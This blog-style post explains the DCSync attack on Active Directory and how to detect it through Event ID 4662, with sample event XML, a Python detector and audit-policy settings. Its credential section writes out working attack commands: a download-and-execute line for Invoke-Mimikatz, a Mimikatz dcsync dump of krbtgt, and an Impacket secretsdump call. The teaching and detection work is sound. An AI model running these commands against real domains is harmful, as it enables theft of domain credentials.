Table of Contents

  1. Abstract
  2. DCSync
    1. Description
    2. Getting Credentials
      1. Local
      2. Remote
    3. Detection
      1. Note

DCSync is a powerful tool in the hands of a red teamer and a nightmare for blue teamers. For the blue teamer, this type of attack may not be feasible to stop, but it can be detected.

Abstract

Here I demonstrate how you can quickly and easily get detections in place for DCSync. I begin with a brief overview of DCSync and a
quick guide on how to use it to get credentials. I then cover how to detect this type of attack and why I chose the route I did.
Finally, I provide references for further review.

DCSync

Description

DCSync works by requesting account password data from a Domain Controller. It can also ask Domain Controllers to replicate information using the Directory Replication Service Remote Protocol. What makes things worse is that DCSync can do this without running any code on a Domain Controller, unlike some of the other ways Mimikatz extracts password data. This attack takes advantage of a necessary function of Active Directory, meaning it cannot be turned off or disabled, leaving us to rely on detection.

Getting Credentials

I split this into two parts, local and remote. As the names suggest, each section covers how to run DCSync depending on whether you want to run it locally or remotely. To follow along, all one needs is a Windows Active Directory Domain Controller and a few joined clients. If running DCSync remotely, a separate machine with Impacket installed is needed.

Local

To run DCSync locally I will use Invoke-Mimikatz [3].

On the Windows Domain Controller start up PowerShell and let's download Invoke-Mimikatz.

iex (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')

Once that has finished we can run DCSync with the following command.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt /domain:Win2016.local"'

For more information, see [4].

Remote

To run DCSync remotely I will use secretsdump.py from Impacket [5]. I recommend creating an Impacket Docker image.

On the remote machine open a terminal/console and run the following. Don't forget to replace <user> with a privileged user, <password> with that user's
password, and <ipaddress> with the Domain Controller's IP address.

secretsdump.py -just-dc <user>:<password>@<ipaddress>

Detection

There are two ways to detect DCSync.

  • Network Monitoring [1]
    • DsGetNCChanges
  • Event ID [6, 7, 8, 9]
    • 4662

For most people and environments Network Monitoring may not be a realistic option, leaving us with the Event ID. To detect DCSync with Event ID 4662 we want to
examine the value of the Properties field and see if it contains Replicating Directory Changes All, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, 9923a32a-3607-11d2-b9be-0000f87a36b2, or 1131f6ac-9c07-11d1-f79f-00c04fc2dcd2 anywhere in it.

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
        <EventID>4662</EventID>
        <Version>0</Version>
        <Level>0</Level>
        <Task>14080</Task>
        <Opcode>0</Opcode>
        <Keywords>0x8020000000000000</Keywords>
        <TimeCreated SystemTime="2018-06-06T12:01:41.388171400Z" />
        <EventRecordID>6583</EventRecordID>
        <Correlation />
        <Execution ProcessID="472" ThreadID="592" />
        <Channel>Security</Channel>
        <Computer>Win2012r2.WIN2012R2.local</Computer>
        <Security />
    </System>
    <EventData>
        <Data Name="SubjectUserSid">S-1-5-21-1384719796-2249325780-1962070806-1001</Data>
        <Data Name="SubjectUserName">vagrant</Data>
        <Data Name="SubjectDomainName">WINDOMAIN</Data>
        <Data Name="SubjectLogonId">0x38867</Data>
        <Data Name="ObjectServer">DS</Data>
        <Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
        <Data Name="ObjectName">%{e3345764-2df3-459e-adb4-615a23cf4374}</Data>
        <Data Name="OperationType">Object Access</Data>
        <Data Name="HandleId">0x0</Data>
        <Data Name="AccessList">%%7688</Data>
        <Data Name="AccessMask">0x100</Data>
        <Data Name="Properties">%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
        <Data Name="AdditionalInfo">-</Data>
        <Data Name="AdditionalInfo2" />
    </EventData>
</Event>

In the example above we can see the Properties value is %%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}. This does contain one of the
strings we are looking for, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, making this a positive match.
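One way to turn the check above into code, as an added example that is not from the original post: the Python below parses a 4662 event in the XML form shown above, pulls out the Properties field and flags the event when any of the listed indicators appear. The trimmed sample events, the allowlist parameter and the DC01$ computer account are constructed for this example.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Indicators the post says to look for in Properties, lower-cased for a
# case-insensitive match. 1131f6ad-... is DS-Replication-Get-Changes-All.
DCSYNC_INDICATORS = (
    "replicating directory changes all",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "9923a32a-3607-11d2-b9be-0000f87a36b2",
    "1131f6ac-9c07-11d1-f79f-00c04fc2dcd2",
)

def parse_event(xml_text):
    """Return EventID plus every EventData <Data Name=...> value as a dict."""
    root = ET.fromstring(xml_text)
    event = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    event["EventID"] = int(root.findtext("e:System/e:EventID", default="0", namespaces=NS))
    return event

def is_dcsync(event, allowlist=()):
    """True when a 4662 DS access event carries a replication right in Properties.
    allowlist: subject names that replicate legitimately (assumed here the DCs' own
    computer accounts, e.g. DC01$), so routine DC-to-DC replication stays quiet."""
    if event.get("EventID") != 4662 or event.get("ObjectServer") != "DS":
        return False
    if event.get("SubjectUserName", "") in allowlist:
        return False
    props = event.get("Properties", "").lower()
    return any(indicator in props for indicator in DCSYNC_INDICATORS)

def sample_event(user, properties):
    """Constructed 4662 event trimmed to the fields the rule reads."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID><Channel>Security</Channel></System>
  <EventData>
    <Data Name="SubjectUserName">{user}</Data>
    <Data Name="ObjectServer">DS</Data>
    <Data Name="Properties">{properties}</Data>
  </EventData>
</Event>"""

REPL_ALL = "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"
SUSPICIOUS = sample_event("vagrant", REPL_ALL)     # a user account pulling replication data
DC_REPLICATION = sample_event("DC01$", REPL_ALL)   # a DC doing its normal replication job
BENIGN = sample_event("vagrant", "%%7688 {19195a5b-6da0-11d0-afd3-00c04fd930c9}")

if __name__ == "__main__":
    for label, xml in (("suspicious", SUSPICIOUS), ("dc", DC_REPLICATION), ("benign", BENIGN)):
        print(label, is_dcsync(parse_event(xml), allowlist={"DC01$"}))
```

A compromised DC computer account would be hidden by the allowlist, so keep it to the DCs you actually operate and review it when the DC set changes.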

Not all machines have logging turned on for this event; for example, on Windows Server 2016 the GPO will need to be set to log this Event ID. This is done by opening the Local Group Policy
Editor and going to Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy. Right click on Audit directory service access and then
click on Properties. Check the box for Success and click Apply.

Note

On my Windows 2016 server the GPO keeps getting turned off. Searching, I did find two posts [10, 5] where people
were having issues similar to the one I am experiencing. Though in these articles there were no sufficient answers.

Footnotes

[1] ADSecurity: Mimikatz DCSync Usage, Exploitation, and Detection

[2] Extracting User Password Data with Mimikatz DCSync

[3] Invoke-Mimikatz

[4] harmj0y: mimikatz-and-dcsync-and-extrasids-oh-my

[5] security auditing being turned off

[6] gentilkiwi splunk

[7] ultimatewindowssecurity

[8] ultimatewindowssecurity2

[9] modern-active-directory-attack-scenarios-and-how-to-detect-them
